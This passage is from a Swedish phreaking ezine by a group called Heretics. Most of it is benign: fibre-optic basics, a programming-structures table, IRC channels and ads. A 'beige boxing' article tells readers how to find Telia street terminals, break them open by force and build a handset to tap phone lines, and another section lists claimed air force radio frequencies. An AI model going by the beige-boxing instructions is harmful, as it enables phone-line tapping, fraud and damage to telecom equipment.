+----+ /\ /\ || || || || || || Optisk Optisk Sändare Mottagare Det finns många olika fördelar med optofibersystem så som t.ex. låg vikt ,hög kapacitet, liten kabeldimension och långa avstånd till förstärkare. En opto kabel består av en nypa olika lager av glasfiber. Glaset är mycket rent, grymt rent faktiskt. Om det skulle kunna gå att se in i ett fiber så skulle man kunna se flera mil. Genom kabeln skickas ett infrarött ljus genom fibern, eventuellt genom plast vid kortare överföringsavstånd. Ett optiskt fiber består av 4 lager. Jag börjar med det yttersta lagret. 1. Sekundärskydd 1mm 2. Primärskydd 25 µm 3. Mantel 125 µm 4. Kärna 10 µm Opto kabeln täcks av ett lager av stål eller plast som ger önskad hållfasthet mot böjning. Kabeln innhåller även fyllnadsmaterial som skyddar fibrerna mot böjning och väta. OBS! Denna information är skrivet med egna ord men från en källa (nedan) Om du vill veta mera om Optofiber så läs Att förstå telekommunikation 1. Källa: Att förstå Tele Telekommunikation 1 o----------------------------------------------------------------------o ¦[12] Hemliga frekvenser crazy-train ¦ o----------------------------------------------------------------------o Här har vi lite "hemliga" frekvenser för t.ex radioamatörer och sånt folk. FLYGVAPNET STIDSLEDNING: STRILBAND UHF(225-399,95 MHZ) 255.35 290.95 292.85 KANALKOD 423 290.80 290.90 270.80 346.70 276.80 281.10 276.35 273.70 296.10 STRILBAND VHF 142.45 143.45 141.10 134.80 138.25 134.90 126.15 138.10 134.20 135.20 138.80 140.10 132.30 KANALKOD 500 130.50 129.45 DIV SAMHORANDE FRKVENSER: 138.60 ALLM,MARIN. 143.65 KANALKOD 658 122.875(AM) o----------------------------------------------------------------------o ¦[13] Svensk Beige Boxing TheClown ¦ o----------------------------------------------------------------------o Inledning: I denna artikel skall jag beskriva svensk beige-boxing på djupet. Var hittar jag tele-terminaler som går att använda, hur kopplar jag in mig på dem och vilka verktyg skall jag ha med mig när jag är ute och "arbetar" på fältet. Denna artikel är främst skriven till "Heretics" men eftersom jag numera startat en egen grupp så kommer vi att använda denna ganska mycket. Hoppas att ifall du inte har en aning om hur svensk Beige-boxing går till kommer att få upp ögonen för detta efter du läst denna artikel. Olika Tele-Terminaler: Japanare: Japanare är små gråa/vita rör med svart lock som telia så smart har placerat ut lite varstans i vårt samhälle. De finns oftast vid täta bostadsområden eller vid radhusområden. De finns oftast i närhet eller brevid lyktstolpar eller elskåp. Gråsuggor: Små gråa skåp ca 20-25 cm breda som oftast hänger på lite äldre hyreshu- s. Oftast hänger de på utsidan av huset, men det finns också de fall där de hänger inne i trappuppgången. Dessa är inte lika enkla att ta sig in i utan att föra en massa oväsen, men mer till hur det går till sedan. Kottar: Dessa små prylar har nog inte alla sett såvida ni inte har problem med nacken eller vet att de finns..de är små vita eller gröna porslinsklock- or som sitter längst upp i telefonstolpar. Enda kruxet när man skall koppla in sig på dessa är att man måste vara en hejare på att klättra eller kanske på yxan för att komma åt kotten. Hur man tar sig in i teleterminalerna: När man skall koppla in sig i dessa fungerar oftast det gamla hederliga sättet: VÅLD! Eller några häftiga hammare eller avbitar-tängar som du naturligtvis har i din lilla väska. Skall lista lite verktyg som kan vara bra att ha med sig när man är ute på utflykt: 1st Lång vanlig skruvmejsel. 1st Liten vanlig skruvmejsel 1st Stjärnmejsel 1st Multikabeltång (bra att ha istället för en massa småtänger Massa olika kablar av alla de slag (ifall vill vill förlänga osv) Naturligtvis kan det vara bra att ha en LMHS (linemans handset) med sig också för att du skall kunna göra något när du väl tagit dig in i teleterminalen. Så här kommer en beskrivning på hur du skall bygga dig en LMHS av bästa kvalite. Linemans Handset: De enda snygga LMHS jag har sett e de som telia självs gjort, men vad kan man begära, vi gör ju våra hemma medans de får sina fabriks tillver- kade. Men ifall man kämpar bra så kan man få sin egna LMHS riktigt tjusig.Men lägg inte ned för mycket möda på dem, med tanke på att de kan gå sönder väldigt lätt. Telefoner är inte till för att man skall använda ute Ju. Vad behöver du för att bygga en LMHS: 1 st telefon..helst en sådandär med knapparna i luren 2 st krokodilklämmor 1 st Lödtång (inte nödvändig, men det håller bättre) Ta reda på var kabel X och X ligger i den telefon, brukar se ut så här: -------------------------------- I TELEFONEN I I I I I I I I I I I I I T T X X T T T T T T T T T T T T T T T T T T T T Klipp av telefon jacket och skala kabeln . Skala även kablarna X och X och fäst krokodil klämmor på X och X. Sedan tar du och skruvar ihop telefonen igen. Sedan har du en egen LMHS som du kan ut och testa. Känner att jag inte skall skriva mer om svensk beigeboxing just nu utan man kan väl se detta som en liten intruduktion till svensk beigeboxning. Skriven av: TheClown För: Heretics och UPOS - Knash noterar gärnet... Kottar: de är små vita eller gröna porslinsklock- or som sitter längst upp i telefonstolpar. uhh...kottar är inte vita eller gröna, har sånna här och dom är svarta och en aning större en en cola burk, jag har ju klättrat upp och koll- at själv. Det gamla hedliga sättet VÅLD !!! Jag tvivlar på att man behöver andvända våld för att öppna en box, då låter det så för jävligt. Tack för bidraget, tänk på att hjälpa Mr Headache också med lite artik- lar också eftersom han behöver hjälp med det. o----------------------------------------------------------------------o ¦[14] Programstrukturer crazy-train ¦ o----------------------------------------------------------------------o -sekvens (följd av programsatser, först sats 1, sedan sats, osv) -selektion (val mellan två vägar i programmet, antingen Ja - satserna eller Nej-satserna) -iteration (upprepning av satser med olika vilkor) Här kommer några exempel i programspråken COMAL, BASIC och Pascal Programstruktur | COMAL (BASIC) | PASCAL ----------------------------------------------------------------------- Val mellan två alt.| 100 IF x < 0 THEN | IF x < 0 THEN Om (vilkor), så | 110 s:=s + x | s:=s + x (Ja-satser) | 120 ELSE | ELSE BEGIN annars | 130 y:=y + x | y:=y + 5 Nej-satser) | 140 x:=x + 5 | x:= x + 5 slut på valet | 150 ENDIF | END; | (I BASIC skrivs IF-satsen på | | en rad utan ENDIF) | ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Upprepa så länge som| 100 WHILE t < 100 DO | WHILE t < 100 DO BEGIN Så länge (vilkor) | 110 s:=s + t | s:=s + t utför (satser) | 120 t:=t + 2 | t:=t + 2 slut på satsen | 130 ENDWHILE | END; | (I BASIC vanligen utan DO | | och med WEND som slut) | ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Upprepa tills | 100 REPEAT | REPEAT Upprepa | 110 x:=(x+a/x)/2 | x:=(x+a/x)/2 (satser) | 120 UNTIL ABS (x-a/x)<0.001 | UNTIL ABS (x-a/x)<0.001 tills (vilkor) | (I BASIC saknas vanligen | | REPEAT-satsen | | | ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Upprepa ett bestämt | 100 FOR i:= 1 TO n DO | FOR i:=1 TO n DO BEGIN antal gånger | 110 s:=s + x | s:=s + x; Upprepa för | 120 x:=x + 1 | x:=x + 1 i=1, 2 ..., n | 130 NEXT i | END; (satser) | (I BASIC utan DO) | slut på upprepningen| | ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ -Arimetiska operatorer De fyra vanliga arimetiska operatorerna skrivs + - * / Upphöjt till skrivs i COMAL (BASIC): a ^ x (eller ibland a ü x, a ** x) PASCAL: EXP(LN(a)*x) -Jämförelseoperatorer och logiska operatorer I vilkorsuttrycken används jämförelseoperatorer och logiska operatorer. ________________________________________________________________________ Jämförelseoperator | Exempel | Betydelse ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ = | A = B | A är lika med B < > | A < > B | A är inte lika med B > | A > B | A är större än B < | A < B | A är mindre än B > = | A > = B | A är sötrre än eller lika med B < = | A < = B | A är mindre än eller lika med B ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ ________________________________________________________________________ Logisk operator | Exempel | Sant/Falskt ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ AND (och) | (30 > 5*5) AND ( -7 < -5) | Sant OR (eller) | (2*3 =5) OR (2*3=6) | Sant NOT (inte) | NOT (3*333 < 1000) | Falskt ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Standardfunktioner ________________________________________________________________________ Funktion | COMAL (BASIC) | Pascal | Kommentar ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ sin x | SIN(X) | SIN(X) | X anges i radianer cos x | COS(X) | COS(X) | X anges i radianer tan x | TAN(X) | (saknas) | X anges i radianer arctan x | ATN(X) | ARCTAN(X) | ger vinkeln i radianer e^x | EXP(X) | EXP(X) | ln | LOG(X) | LN(X) | X > 0 roten ur X | SQR(X) | SQRT(X) | OBS! Pascalbeteckningen X^2 | (X*X, X ^ 2) | SQR(X) | kvadrera heltal (INTEGER) ent x | INT(X) | INT(X) | heltalsdelen av X (REAL) | | TRUNC(X) | heltalsdelen av X (INTEGER) |x| | ABS(X) | ABS(X) | absolutbeloppet av X | RND | RANDOM | slumptalsalstrare ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ o----------------------------------------------------------------------o ¦[15] Ett par IRCnet kanaler knash ¦ o----------------------------------------------------------------------o Här kommer en liten lista med bra kanaler på IRCnet (?) Server irc.swipnet.se Kanaler #blackmetal.se #vsp #eject #flug #Linux #Linux.se #security #Pyttemjuk #ulug #unix #unix.se #hacking #phonesex #fist #hacknews o----------------------------------------------------------------------o ¦[16] Köpes, Säljes och Sökes ¦ o----------------------------------------------------------------------o Köpes: 1. Flashback tidningar köpes pris dikuteras nilssonmarcus@hotmail.com 2. Bärbar dator, fett med billig. knash@linux.nu Sökes 1. Information phf knash@linux.nu 2. Danska, Norska och Finska Phreakers sökes. maila knash@linux.nu o----------------------------------------------------------------------o ¦[17] Frågor och kanske svar ¦ o----------------------------------------------------------------------o Jag har starten en lite myshörna med frågor och svar, om d u har några frågor eller vill svara på en fråga som står här så skickar du ett mail till knash@linux.nu. Hur blir man en framgångsrik grupp ? | Anonym Svar: Börja med att fixa ett snyggt namn på gruppen och en hemsida med mycket snygg design och även ett eZine är mycket uppskattat och även det med ett mycket kewlt namn och snygg ascii design. Tänk på när du, ni konstruerar zinet att ni har mera tekniskt informa- tion en hummor och ironi. Typ 80% tekniskt 20% bullshit. Börja skriva textfiler också om Hacking, Phreaking, Cracking, Carding etc. Ett tips är att rippa telias manualer och skriva om dom med egna ord, tänk dig en "AXE Växlar från Grunden" eller kanske tom. "Avancerat information blad om AXE växlar" annars är det ju bara att översätta Engelska "högklass" textfiler till svenska, t.ex. Rainbow Books. Lycka till med allt. //knash o----------------------------------------------------------------------o ¦[18] Copyright ¦ o----------------------------------------------------------------------o Jopp visst är det en lam Copyleft på detta eZine för att folk inte så ändra en massa grejer i zinet, men seriöst "Who cares?" Om du lägger upp zinet på din hemsid, underground cd eller någonstanns där du publicerar den skicka genast ett mail till mig (knash@linux.nu) och tala om det. Jag kommer att göra reklam för din hemsida i zinet då =) Copyright (c) Heretics Inc. All right Servered o----------------------------------------------------------------------o ¦[19] Prenumeration ¦ o----------------------------------------------------------------------o Starta prenumeration Skicka ett email till knash@linux.nu med subscribe OI i Subjekt rutan. Avlsuta prenumeration Skicka ett email till knash@linux.nu med unsubscribe OI i Subjekt ruta- n. o----------------------------------------------------------------------o ¦ ¦ o----------------------------------------------------------------------o O U T L A W I N F O R M A T I V A F R O M H E R E T I C S I N C . W W W . H E R E T I C S . C J B . N E T K N A S H @ L I N U X . N U